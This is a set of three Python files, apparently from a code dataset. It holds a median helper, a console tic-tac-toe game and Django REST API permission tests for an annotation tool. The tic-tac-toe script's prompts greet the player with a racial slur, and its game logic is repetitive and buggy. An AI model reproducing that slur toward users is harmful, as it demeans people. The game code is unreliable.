Given an unsorted list of numeric values, return median value (as a float).
Note that in the case of even-length lists of values, we apply the value to
the left of the center to be the median (such that the median can only be
a value from the list of values).
Eg: get_median([1,2,3,4]) == 2, not 2.5.
"""
if not values:
raise Exception("Cannot calculate median of list with no values!")
sorted_values = deepcopy(values)
sorted_values.sort() # Not calling `sorted` b/c `sorted_values` may not be list.
if len(values) % 2 == 0:
return sorted_values[len(values)//2-1]
else:
return sorted_values[len(values)//2]
def test():
test_median()
def test_median():
feature_values = [4,1,3,2]
correct_median = 2
print ("median value is correct?", get_median(feature_values) == correct_median)
if __name__=="__main__":
test()
| StarcoderdataPython |
3386235 | print("Hey Nigga! \n welcome to tic tac toe")
print("who do you want to play with?\n")
mode=str(input("type - 'Human' or 'computer'\n ").upper())
def HumanvsHuman():
theBoard = {"1": '1', "2": '2', "3": '3',
"4": '4', "5": '5', "6": '6',
"7": '7', "8": '8', "9": '9'}
print("Now playing HUMAN vs HUMAN Tic Tac Toe")
def gamecheck(count):
if count < 5:
if theBoard['7'] == theBoard['8'] == theBoard['9'] != ' ': # across the top
a = theBoard['7']
print("\nGame Over.\n")
print(" **** " + a + " won. ****")
playAgain()
elif theBoard['4'] == theBoard['5'] == theBoard['6'] != ' ': # across the middle
b = theBoard['4']
print("\nGame Over.\n")
print(" **** " + b + " won. ****")
playAgain()
elif theBoard['1'] == theBoard['2'] == theBoard['3'] != ' ': # across the bottom
c = theBoard['1']
print("\nGame Over.\n")
print(" **** " + c + " won. ****")
playAgain()
elif theBoard['1'] == theBoard['4'] == theBoard['7'] != ' ': # down the left side
d = theBoard['1']
print("\nGame Over.\n")
print(" **** " + d + " won. ****")
playAgain()
elif theBoard['2'] == theBoard['5'] == theBoard['8'] != ' ': # down the middle
e = theBoard['2']
print("\nGame Over.\n")
print(" **** " + e + " won. ****")
playAgain()
elif theBoard['3'] == theBoard['6'] == theBoard['9'] != ' ': # down the right side
f = theBoard['3']
print("\nGame Over.\n")
print(" **** " + f + " won. ****")
playAgain()
elif theBoard['7'] == theBoard['5'] == theBoard['3'] != ' ': # diagonal
g = theBoard['7']
print("\nGame Over.\n")
print(" **** " + g + " won. ****")
playAgain()
elif theBoard['1'] == theBoard['5'] == theBoard['9'] != ' ': # diagonal
h = theBoard['1']
print("\nGame Over.\n")
print(" **** " + h + " won. ****")
playAgain()
else:
print("Draw the match")
playAgain()
def printboard():
print(theBoard["1"], theBoard["2"], theBoard["3"])
print(theBoard["4"], theBoard["5"], theBoard["6"])
print(theBoard["7"], theBoard["8"], theBoard["9"])
def gamePlay():
"""------------------------------------------------------------------------------------------------------------------"""
print("Inorder to play this game , \n Enter the position you want to place X and O respectively")
printboard()
# firstMove
xMove = str(input("hey X,Enter a position:\n").upper())
theBoard.update({xMove: "X"})
gamecheck(1)
oMove = str(input("hey O, Enter a position:\n").upper())
theBoard.update({oMove: "O"})
gamecheck(1)
printboard()
gamecheck(1)
count = 1
"""------------------------------------------------------------------------------------------------------------------"""
# second Move
xmove1 = xMove
omove1 = oMove
print("Positions are taken", xmove1, omove1)
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
oMove = str(input("hey O, Enter a position:\n").upper())
if omove1 != oMove and xmove1 != xMove:
theBoard.update({xMove: "X"})
gamecheck(2)
theBoard.update({oMove: "O"})
gamecheck(2)
printboard()
else:
print("choose some other positions", xmove1, "and", omove1, "are taken")
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
oMove = str(input("hey O, Enter a position:\n").upper())
theBoard.update({xMove: "X"})
gamecheck(2)
theBoard.update({oMove: "O"})
gamecheck(2)
printboard()
count = 2
"""------------------------------------------------------------------------------------------------------------------"""
# third Move
xmove2 = xMove
omove2 = oMove
print("choose some positions", xmove2, xmove1, omove1, omove2, "are taken")
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
oMove = str(input("hey O, Enter a position:\n").upper())
if omove2 != oMove and omove1 != oMove and xmove2 != xMove and xmove1 != xMove:
theBoard.update({xMove: "X"})
gamecheck(3)
theBoard.update({oMove: "O"})
gamecheck(3)
printboard()
else:
print("choose some other positions", xmove2, xmove1, omove1, omove2, "are taken")
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
gamecheck(3)
oMove = str(input("hey O, Enter a position:\n").upper())
gamecheck(3)
theBoard.update({xMove: "X"})
theBoard.update({oMove: "O"})
printboard()
gamecheck(3)
count = 3
"""------------------------------------------------------------------------------------------------------------------"""
# Fourth Move
xmove3 = xMove
omove3 = oMove
print("choose some positions", xmove2, xmove1, omove1, omove2, omove3, xmove3, "are taken")
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
oMove = str(input("hey O, Enter a position:\n").upper())
gamecheck(4)
if xmove3 != xMove and omove3 != oMove and omove2 != oMove and omove1 != oMove and xmove2 != xMove and xmove1 != xMove:
theBoard.update({xMove: "X"})
gamecheck(4)
theBoard.update({oMove: "O"})
gamecheck(4)
printboard()
else:
print("choose some other positions", xmove2, xmove1, omove1, omove2, xmove3, omove3, "are taken")
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
gamecheck(4)
oMove = str(input("hey O, Enter a position:\n").upper())
gamecheck(4)
theBoard.update({xMove: "X"})
theBoard.update({oMove: "O"})
printboard()
count = 4
"""------------------------------------------------------------------------------------------------------------------"""
# fifth_move
count = 5
xmove = str(input("hey X,Enter a position:\n").upper())
if xmove3 != xMove and omove3 != oMove and omove2 != oMove and omove1 != oMove and xmove2 != xMove and xmove1 != xMove:
theBoard.update({xmove: "X"})
gamecheck(5)
printboard()
else:
print("choose some other positions", xmove2, xmove1, omove1, omove2, xmove3, omove3, "are taken")
xmove4 = str(input("hey X,Enter a position").upper())
theBoard.update({xmove4: "X"})
gamecheck(5)
printboard()
def playAgain():
print("Do you want to play again ?\n")
print("yes or no ")
sol = str(input("Enter yes or no:\n").upper())
count = 0
if sol == "YES":
count = 0
gamePlayagain()
else:
exit()
def boardReset():
theBoard.update({"1": '1'})
theBoard.update({"2": '2'})
theBoard.update({"3": '3'})
theBoard.update({"4": '4'})
theBoard.update({"5": '5'})
theBoard.update({"6": '6'})
theBoard.update({"7": '7'})
theBoard.update({"8": '8'})
theBoard.update({"9": '9'})
def gamePlayagain():
"""------------------------------------------------------------------------------------------------------------------"""
print(
"Inorder to play this game again once more , \n Enter the position you want to place X and O respectively")
boardReset()
printboard()
# firstMove
xMove = str(input("hey X,Enter a position:\n").upper())
theBoard.update({xMove: "X"})
gamecheck(1)
oMove = str(input("hey O, Enter a position:\n").upper())
theBoard.update({oMove: "O"})
gamecheck(1)
printboard()
gamecheck(1)
count = 1
"""------------------------------------------------------------------------------------------------------------------"""
# second Move
xmove1 = xMove
omove1 = oMove
print("Positions are taken", xmove1, omove1)
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
oMove = str(input("hey O, Enter a position:\n").upper())
if omove1 != oMove and xmove1 != xMove:
theBoard.update({xMove: "X"})
gamecheck(2)
theBoard.update({oMove: "O"})
gamecheck(2)
printboard()
else:
print("choose some other positions", xmove1, "and", omove1, "are taken")
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
oMove = str(input("hey O, Enter a position:\n").upper())
theBoard.update({xMove: "X"})
gamecheck(2)
theBoard.update({oMove: "O"})
gamecheck(2)
printboard()
count = 2
"""------------------------------------------------------------------------------------------------------------------"""
# third Move
xmove2 = xMove
omove2 = oMove
print("choose some positions", xmove2, xmove1, omove1, omove2, "are taken")
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
oMove = str(input("hey O, Enter a position:\n").upper())
if omove2 != oMove and omove1 != oMove and xmove2 != xMove and xmove1 != xMove:
theBoard.update({xMove: "X"})
gamecheck(3)
theBoard.update({oMove: "O"})
gamecheck(3)
printboard()
else:
print("choose some other positions", xmove2, xmove1, omove1, omove2, "are taken")
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
gamecheck(3)
oMove = str(input("hey O, Enter a position:\n").upper())
gamecheck(3)
theBoard.update({xMove: "X"})
theBoard.update({oMove: "O"})
printboard()
gamecheck(3)
count = 3
"""------------------------------------------------------------------------------------------------------------------"""
# Fourth Move
xmove3 = xMove
omove3 = oMove
print("choose some positions", xmove2, xmove1, omove1, omove2, omove3, xmove3, "are taken")
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
oMove = str(input("hey O, Enter a position:\n").upper())
gamecheck(4)
if xmove3 != xMove and omove3 != oMove and omove2 != oMove and omove1 != oMove and xmove2 != xMove and xmove1 != xMove:
theBoard.update({xMove: "X"})
gamecheck(4)
theBoard.update({oMove: "O"})
gamecheck(4)
printboard()
else:
print("choose some other positions", xmove2, xmove1, omove1, omove2, xmove3, omove3, "are taken")
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
gamecheck(4)
oMove = str(input("hey O, Enter a position:\n").upper())
gamecheck(4)
theBoard.update({xMove: "X"})
theBoard.update({oMove: "O"})
printboard()
count = 4
"""------------------------------------------------------------------------------------------------------------------"""
# fifth_move
count = 5
xmove = str(input("hey X,Enter a position:\n").upper())
if xmove3 != xMove and omove3 != oMove and omove2 != oMove and omove1 != oMove and xmove2 != xMove and xmove1 != xMove:
theBoard.update({xmove: "X"})
gamecheck(5)
printboard()
else:
print("choose some other positions", xmove2, xmove1, omove1, omove2, xmove3, omove3, "are taken")
xmove4 = str(input("hey X,Enter a position:\n").upper())
theBoard.update({xmove4: "X"})
gamecheck(5)
printboard()
gamePlay()
def HumanvsComputer():
import random
print("Now playing HUMAN vs Computer Tic Tac Toe")
theBoard = {"1": '1', "2": '2', "3": '3',
"4": '4', "5": '5', "6": '6',
"7": '7', "8": '8', "9": '9'}
def gamecheck(count):
if count < 5:
if theBoard['7'] == theBoard['8'] == theBoard['9'] != ' ': # across the top
a = theBoard['7']
printboard()
print("bottom ")
print("\nGame Over.\n")
print(" **** " + a + " won. ****")
playAgain()
elif theBoard['4'] == theBoard['5'] == theBoard['6'] != ' ': # across the middle
b = theBoard['4']
printboard()
print("across the middle")
print("\nGame Over.\n")
print(" **** " + b + " won. ****")
playAgain()
elif theBoard['1'] == theBoard['2'] == theBoard['3'] != ' ': # across the bottom
c = theBoard['1']
printboard()
print("top line")
print("\nGame Over.\n")
print(" **** " + c + " won. ****")
playAgain()
elif theBoard['1'] == theBoard['4'] == theBoard['7'] != ' ': # down the left side
d = theBoard['1']
printboard()
print("left side")
print("\nGame Over.\n")
print(" **** " + d + " won. ****")
playAgain()
elif theBoard['2'] == theBoard['5'] == theBoard['8'] != ' ': # down the middle
e = theBoard['2']
printboard()
print("down the middle")
print("\nGame Over.\n")
print(" **** " + e + " won. ****")
playAgain()
elif theBoard['3'] == theBoard['6'] == theBoard['9'] != ' ': # down the right side
f = theBoard['3']
printboard()
print("down the right side")
print("\nGame Over.\n")
print(" **** " + f + " won. ****")
playAgain()
elif theBoard['7'] == theBoard['5'] == theBoard['3'] != ' ': # diagonal
g = theBoard['7']
printboard()
print("diagonal")
print("\nGame Over.\n")
print(" **** " + g + " won. ****")
playAgain()
elif theBoard['1'] == theBoard['5'] == theBoard['9'] != ' ': # diagonal
h = theBoard['1']
printboard()
print("diagonal")
print("\nGame Over.\n")
print(" **** " + h + " won. ****")
playAgain()
else:
printboard()
print("Draw the match")
playAgain()
def printboard():
print(theBoard["1"], theBoard["2"], theBoard["3"])
print(theBoard["4"], theBoard["5"], theBoard["6"])
print(theBoard["7"], theBoard["8"], theBoard["9"])
def gamePlay():
"""------------------------------------------------------------------------------------------------------------------"""
print("Inorder to play this game , \n Enter the position you want to place X and O respectively")
printboard()
# firstMove
move_list = ["1", "2", "3", "4", "5", "6", "7", "8", "9"]
xMove = str(input("hey X,Enter a position:\n").upper())
theBoard.update({xMove: "X"})
gamecheck(1)
move_list.remove(xMove)
oMove = random_num = random.choice(move_list)
theBoard.update({oMove: "O"})
move_list.remove(oMove)
gamecheck(1)
printboard()
gamecheck(1)
count = 1
"""------------------------------------------------------------------------------------------------------------------"""
# second Move
xmove1 = xMove
omove1 = oMove
print("Positions are taken", xmove1, omove1)
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
move_list.remove(xMove)
oMove = random_num = random.choice(move_list)
move_list.remove(oMove)
if omove1 != oMove and xmove1 != xMove:
theBoard.update({xMove: "X"})
gamecheck(2)
theBoard.update({oMove: "O"})
gamecheck(2)
printboard()
else:
print("choose some other positions", xmove1, "and", omove1, "are taken")
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
move_list.remove(xMove)
oMove = random_num = random.choice(move_list)
move_list.remove(xMove)
theBoard.update({xMove: "X"})
gamecheck(2)
theBoard.update({oMove: "O"})
gamecheck(2)
printboard()
count = 2
"""------------------------------------------------------------------------------------------------------------------"""
# third Move
xmove2 = xMove
omove2 = oMove
print("choose some positions", xmove2, xmove1, omove1, omove2, "are taken")
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
move_list.remove(xMove)
oMove = random_num = random.choice(move_list)
move_list.remove(oMove)
if omove2 != oMove and omove1 != oMove and xmove2 != xMove and xmove1 != xMove:
theBoard.update({xMove: "X"})
gamecheck(3)
theBoard.update({oMove: "O"})
gamecheck(3)
printboard()
else:
print("choose some other positions", xmove2, xmove1, omove1, omove2, "are taken")
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
move_list.remove(xMove)
gamecheck(3)
oMove = random_num = random.choice(move_list)
move_list.remove(xMove)
gamecheck(3)
theBoard.update({xMove: "X"})
theBoard.update({oMove: "O"})
printboard()
gamecheck(3)
count = 3
"""------------------------------------------------------------------------------------------------------------------"""
# Fourth Move
xmove3 = xMove
omove3 = oMove
print("choose some positions", xmove2, xmove1, omove1, omove2, omove3, xmove3, "are taken")
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
move_list.remove(xMove)
oMove = random_num = random.choice(move_list)
move_list.remove(oMove)
gamecheck(4)
if xmove3 != xMove and omove3 != oMove and omove2 != oMove and omove1 != oMove and xmove2 != xMove and xmove1 != xMove:
theBoard.update({xMove: "X"})
gamecheck(4)
theBoard.update({oMove: "O"})
gamecheck(4)
printboard()
else:
print("choose some other positions", xmove2, xmove1, omove1, omove2, xmove3, omove3, "are taken")
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
move_list.remove(xMove)
gamecheck(4)
oMove = random_num = random.choice(move_list)
move_list.remove(oMove)
gamecheck(4)
theBoard.update({xMove: "X"})
theBoard.update({oMove: "O"})
printboard()
count = 4
"""------------------------------------------------------------------------------------------------------------------"""
# fifth_move
count = 5
xmove = str(input("hey X,Enter a position:\n").upper())
if xmove3 != xMove and omove3 != oMove and omove2 != oMove and omove1 != oMove and xmove2 != xMove and xmove1 != xMove:
theBoard.update({xmove: "X"})
gamecheck(5)
printboard()
else:
print("choose some other positions", xmove2, xmove1, omove1, omove2, xmove3, omove3, "are taken")
xmove4 = str(input("hey X,Enter a position").upper())
theBoard.update({xmove4: "X"})
gamecheck(5)
printboard()
def playAgain():
print("Do you want to play again ?\n")
print("yes or no ")
sol = str(input("Enter yes or no:\n").upper())
count = 0
if sol == "YES":
count = 0
gamePlayagain()
else:
exit()
def boardReset():
theBoard.update({"1": '1'})
theBoard.update({"2": '2'})
theBoard.update({"3": '3'})
theBoard.update({"4": '4'})
theBoard.update({"5": '5'})
theBoard.update({"6": '6'})
theBoard.update({"7": '7'})
theBoard.update({"8": '8'})
theBoard.update({"9": '9'})
def gamePlayagain():
"""------------------------------------------------------------------------------------------------------------------"""
print(
"Inorder to play this game again once more , \n Enter the position you want to place X and O respectively")
boardReset()
printboard()
# firstMove
move_list = ["1", "2", "3", "4", "5", "6", "7", "8", "9"]
xMove = str(input("hey X,Enter a position:\n").upper())
theBoard.update({xMove: "X"})
gamecheck(1)
move_list.remove(xMove)
oMove = random_num = random.choice(move_list)
theBoard.update({oMove: "O"})
move_list.remove(oMove)
gamecheck(1)
printboard()
gamecheck(1)
count = 1
"""------------------------------------------------------------------------------------------------------------------"""
# second Move
xmove1 = xMove
omove1 = oMove
print("Positions are taken", xmove1, omove1)
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
move_list.remove(xMove)
oMove = random_num = random.choice(move_list)
move_list.remove(oMove)
if omove1 != oMove and xmove1 != xMove:
theBoard.update({xMove: "X"})
gamecheck(2)
theBoard.update({oMove: "O"})
gamecheck(2)
printboard()
else:
print("choose some other positions", xmove1, "and", omove1, "are taken")
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
move_list.remove(xMove)
oMove = random_num = random.choice(move_list)
move_list.remove(xMove)
theBoard.update({xMove: "X"})
gamecheck(2)
theBoard.update({oMove: "O"})
gamecheck(2)
printboard()
count = 2
"""------------------------------------------------------------------------------------------------------------------"""
# third Move
xmove2 = xMove
omove2 = oMove
print("choose some positions", xmove2, xmove1, omove1, omove2, "are taken")
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
move_list.remove(xMove)
oMove = random_num = random.choice(move_list)
move_list.remove(oMove)
if omove2 != oMove and omove1 != oMove and xmove2 != xMove and xmove1 != xMove:
theBoard.update({xMove: "X"})
gamecheck(3)
theBoard.update({oMove: "O"})
gamecheck(3)
printboard()
else:
print("choose some other positions", xmove2, xmove1, omove1, omove2, "are taken")
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
move_list.remove(xMove)
gamecheck(3)
oMove = random_num = random.choice(move_list)
move_list.remove(xMove)
gamecheck(3)
theBoard.update({xMove: "X"})
theBoard.update({oMove: "O"})
printboard()
gamecheck(3)
count = 3
"""------------------------------------------------------------------------------------------------------------------"""
# Fourth Move
xmove3 = xMove
omove3 = oMove
print("choose some positions", xmove2, xmove1, omove1, omove2, omove3, xmove3, "are taken")
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
move_list.remove(xMove)
oMove = random_num = random.choice(move_list)
move_list.remove(oMove)
gamecheck(4)
if xmove3 != xMove and omove3 != oMove and omove2 != oMove and omove1 != oMove and xmove2 != xMove and xmove1 != xMove:
theBoard.update({xMove: "X"})
gamecheck(4)
theBoard.update({oMove: "O"})
gamecheck(4)
printboard()
else:
print("choose some other positions", xmove2, xmove1, omove1, omove2, xmove3, omove3, "are taken")
print("-------------------------------------------------------")
xMove = str(input("hey X,Enter a position:\n").upper())
move_list.remove(xMove)
gamecheck(4)
oMove = random_num = random.choice(move_list)
move_list.remove(oMove)
gamecheck(4)
theBoard.update({xMove: "X"})
theBoard.update({oMove: "O"})
printboard()
count = 4
"""------------------------------------------------------------------------------------------------------------------"""
# fifth_move
count = 5
xmove = str(input("hey X,Enter a position:\n").upper())
if xmove3 != xMove and omove3 != oMove and omove2 != oMove and omove1 != oMove and xmove2 != xMove and xmove1 != xMove:
theBoard.update({xmove: "X"})
gamecheck(5)
printboard()
else:
print("choose some other positions", xmove2, xmove1, omove1, omove2, xmove3, omove3, "are taken")
xmove4 = str(input("hey X,Enter a position").upper())
theBoard.update({xmove4: "X"})
gamecheck(5)
printboard()
gamePlay()
if mode=="HUMAN":
HumanvsHuman()
elif mode=="COMPUTER":
HumanvsComputer()
else:
print(" hey Nigga, enter a valid Option!!")
mode = str(input("type - 'Human' or 'computer' ").upper())
if mode == "HUMAN":
HumanvsHuman()
elif mode == "COMPUTER":
HumanvsComputer()
else:
print(" hey Nigga, Get lost!!")
exit()
| StarcoderdataPython |
129232 | import os
from django.conf import settings
from django.test import override_settings
from rest_framework import status
from rest_framework.reverse import reverse
from rest_framework.test import APITestCase
from model_mommy import mommy
from ..models import User, SequenceAnnotation, Document, Role, RoleMapping
from ..models import DOCUMENT_CLASSIFICATION, SEQUENCE_LABELING, SEQ2SEQ, SPEECH2TEXT
from ..utils import PlainTextParser, CoNLLParser, JSONParser, CSVParser, FastTextParser
from ..exceptions import FileParseException
DATA_DIR = os.path.join(os.path.dirname(__file__), 'data')
def create_default_roles():
Role.objects.get_or_create(name=settings.ROLE_PROJECT_ADMIN)
Role.objects.get_or_create(name=settings.ROLE_ANNOTATOR)
Role.objects.get_or_create(name=settings.ROLE_ANNOTATION_APPROVER)
def assign_user_to_role(project_member, project, role_name):
role, _ = Role.objects.get_or_create(name=role_name)
RoleMapping.objects.get_or_create(role_id=role.id, user_id=project_member.id, project_id=project.id)
def remove_all_role_mappings():
RoleMapping.objects.all().delete()
class TestHealthEndpoint(APITestCase):
@classmethod
def setUpTestData(cls):
cls.url = reverse(viewname='health')
def test_returns_green_status_on_health_endpoint(self):
response = self.client.get(self.url, format='json')
self.assertEqual(response.data['status'], 'green')
class TestUtilsMixin:
def _patch_project(self, project, attribute, value):
old_value = getattr(project, attribute, None)
setattr(project, attribute, value)
project.save()
def cleanup_project():
setattr(project, attribute, old_value)
project.save()
self.addCleanup(cleanup_project)
@override_settings(STATICFILES_STORAGE='django.contrib.staticfiles.storage.StaticFilesStorage')
class TestProjectListAPI(APITestCase):
@classmethod
def setUpTestData(cls):
cls.main_project_member_name = 'project_member_name'
cls.main_project_member_pass = '<PASSWORD>'
cls.sub_project_member_name = 'sub_project_member_name'
cls.sub_project_member_pass = '<PASSWORD>'
cls.approver_name = 'approver_name_name'
cls.approver_pass = '<PASSWORD>'
cls.super_user_name = 'super_user_name'
cls.super_user_pass = '<PASSWORD>'
create_default_roles()
main_project_member = User.objects.create_user(username=cls.main_project_member_name,
password=cls.main_project_member_pass)
sub_project_member = User.objects.create_user(username=cls.sub_project_member_name,
password=cls.sub_project_member_pass)
approver = User.objects.create_user(username=cls.approver_name,
password=cls.approver_pass)
User.objects.create_superuser(username=cls.super_user_name,
password=cls.super_user_pass,
email='<EMAIL>')
cls.main_project = mommy.make('TextClassificationProject', users=[main_project_member])
cls.sub_project = mommy.make('TextClassificationProject', users=[sub_project_member])
assign_user_to_role(project_member=main_project_member, project=cls.main_project,
role_name=settings.ROLE_ANNOTATOR)
assign_user_to_role(project_member=sub_project_member, project=cls.sub_project,
role_name=settings.ROLE_ANNOTATOR)
assign_user_to_role(project_member=approver, project=cls.main_project,
role_name=settings.ROLE_ANNOTATION_APPROVER)
cls.url = reverse(viewname='project_list')
cls.data = {'name': 'example', 'project_type': 'DocumentClassification',
'description': 'example', 'guideline': 'example',
'resourcetype': 'TextClassificationProject'}
cls.num_project = main_project_member.projects.count()
def test_returns_main_project_to_approver(self):
self.client.login(username=self.approver_name,
password=self.approver_pass)
response = self.client.get(self.url, format='json')
project = response.data[0]
num_project = len(response.data)
self.assertEqual(num_project, self.num_project)
self.assertEqual(project['id'], self.main_project.id)
def test_returns_main_project_to_main_project_member(self):
self.client.login(username=self.main_project_member_name,
password=self.main_project_member_pass)
response = self.client.get(self.url, format='json')
project = response.data[0]
num_project = len(response.data)
self.assertEqual(num_project, self.num_project)
self.assertEqual(project['id'], self.main_project.id)
def test_do_not_return_main_project_to_sub_project_member(self):
self.client.login(username=self.sub_project_member_name,
password=self.sub_project_member_pass)
response = self.client.get(self.url, format='json')
project = response.data[0]
num_project = len(response.data)
self.assertEqual(num_project, self.num_project)
self.assertNotEqual(project['id'], self.main_project.id)
def test_allows_superuser_to_create_project(self):
self.client.login(username=self.super_user_name,
password=self.super_user_pass)
response = self.client.post(self.url, format='json', data=self.data)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertFalse(response.json().get('collaborative_annotation'))
self.assertFalse(response.json().get('randomize_document_order'))
def test_allows_superuser_to_create_project_with_flags(self):
self.client.login(username=self.super_user_name,
password=self.super_user_pass)
data = dict(self.data)
data['collaborative_annotation'] = True
data['randomize_document_order'] = True
response = self.client.post(self.url, format='json', data=data)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertTrue(response.json().get('collaborative_annotation'))
self.assertTrue(response.json().get('randomize_document_order'))
def test_disallows_project_member_to_create_project(self):
self.client.login(username=self.main_project_member_name,
password=self.main_project_member_pass)
response = self.client.post(self.url, format='json', data=self.data)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
@classmethod
def doCleanups(cls):
remove_all_role_mappings()
@override_settings(STATICFILES_STORAGE='django.contrib.staticfiles.storage.StaticFilesStorage')
class TestProjectDetailAPI(APITestCase):
@classmethod
def setUpTestData(cls):
cls.project_member_name = 'project_member_name'
cls.project_member_pass = '<PASSWORD>'
cls.non_project_member_name = 'non_project_member_name'
cls.non_project_member_pass = '<PASSWORD>'
cls.admin_user_name = 'admin_user_name'
cls.admin_user_pass = '<PASSWORD>'
create_default_roles()
cls.project_member = User.objects.create_user(username=cls.project_member_name,
password=cls.project_member_pass)
non_project_member = User.objects.create_user(username=cls.non_project_member_name,
password=cls.non_project_member_pass)
project_admin = User.objects.create_superuser(username=cls.admin_user_name,
password=cls.admin_user_pass,
email='<EMAIL>')
cls.main_project = mommy.make('TextClassificationProject', users=[cls.project_member, project_admin])
mommy.make('TextClassificationProject', users=[non_project_member])
cls.url = reverse(viewname='project_detail', args=[cls.main_project.id])
cls.data = {'description': 'lorem'}
assign_user_to_role(project_member=cls.project_member, project=cls.main_project,
role_name=settings.ROLE_ANNOTATOR)
assign_user_to_role(project_member=project_admin, project=cls.main_project,
role_name=settings.ROLE_PROJECT_ADMIN)
def test_returns_main_project_detail_to_main_project_member(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.get(self.url, format='json')
self.assertEqual(response.data['id'], self.main_project.id)
def test_do_not_return_main_project_to_sub_project_member(self):
self.client.login(username=self.non_project_member_name,
password=self.non_project_member_pass)
response = self.client.get(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_allows_admin_to_update_project(self):
self.client.login(username=self.admin_user_name,
password=self.admin_user_pass)
response = self.client.patch(self.url, format='json', data=self.data)
self.assertEqual(response.data['description'], self.data['description'])
def test_disallows_non_project_member_to_update_project(self):
self.client.login(username=self.non_project_member_name,
password=self.non_project_member_pass)
response = self.client.patch(self.url, format='json', data=self.data)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_allows_admin_to_delete_project(self):
self.client.login(username=self.admin_user_name,
password=self.admin_user_pass)
response = self.client.delete(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
def test_disallows_non_project_member_to_delete_project(self):
self.client.login(username=self.non_project_member_name,
password=self.non_project_member_pass)
response = self.client.delete(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
@classmethod
def doCleanups(cls):
remove_all_role_mappings()
class TestLabelListAPI(APITestCase):
@classmethod
def setUpTestData(cls):
cls.project_member_name = 'project_member_name'
cls.project_member_pass = '<PASSWORD>'
cls.non_project_member_name = 'non_project_member_name'
cls.non_project_member_pass = '<PASSWORD>'
cls.admin_user_name = 'admin_user_name'
cls.admin_user_pass = '<PASSWORD>'
create_default_roles()
cls.project_member = User.objects.create_user(username=cls.project_member_name,
password=cls.project_member_pass)
non_project_member = User.objects.create_user(username=cls.non_project_member_name,
password=cls.non_project_member_pass)
project_admin = User.objects.create_superuser(username=cls.admin_user_name,
password=cls.admin_user_pass,
email='<EMAIL>')
cls.main_project = mommy.make('Project', users=[cls.project_member, project_admin])
cls.main_project_label = mommy.make('Label', project=cls.main_project)
sub_project = mommy.make('Project', users=[non_project_member])
other_project = mommy.make('Project', users=[project_admin])
mommy.make('Label', project=sub_project)
cls.url = reverse(viewname='label_list', args=[cls.main_project.id])
cls.other_url = reverse(viewname='label_list', args=[other_project.id])
cls.data = {'text': 'example'}
assign_user_to_role(project_member=cls.project_member, project=cls.main_project,
role_name=settings.ROLE_ANNOTATOR)
def test_returns_labels_to_project_member(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.get(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_do_not_return_labels_to_non_project_member(self):
self.client.login(username=self.non_project_member_name,
password=self.non_project_member_pass)
response = self.client.get(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_do_not_return_labels_of_other_projects(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.get(self.url, format='json')
label = response.data[0]
num_labels = len(response.data)
self.assertEqual(num_labels, len(self.main_project.labels.all()))
self.assertEqual(label['id'], self.main_project_label.id)
def test_allows_admin_to_create_label(self):
self.client.login(username=self.admin_user_name,
password=self.admin_user_pass)
response = self.client.post(self.url, format='json', data=self.data)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_can_create_multiple_labels_without_shortcut_key(self):
self.client.login(username=self.admin_user_name,
password=self.admin_user_pass)
labels = [
{'text': 'Ruby', 'prefix_key': None, 'suffix_key': None},
{'text': 'PHP', 'prefix_key': None, 'suffix_key': None}
]
for label in labels:
response = self.client.post(self.url, format='json', data=label)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_can_create_same_label_in_multiple_projects(self):
self.client.login(username=self.admin_user_name,
password=self.admin_user_pass)
label = {'text': 'LOC', 'prefix_key': None, 'suffix_key': 'l'}
response = self.client.post(self.url, format='json', data=label)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
response = self.client.post(self.other_url, format='json', data=label)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_can_create_same_suffix_with_different_prefix(self):
self.client.login(username=self.admin_user_name,
password=self.admin_user_pass)
label = {'text': 'Person', 'prefix_key': None, 'suffix_key': 'p'}
response = self.client.post(self.url, format='json', data=label)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
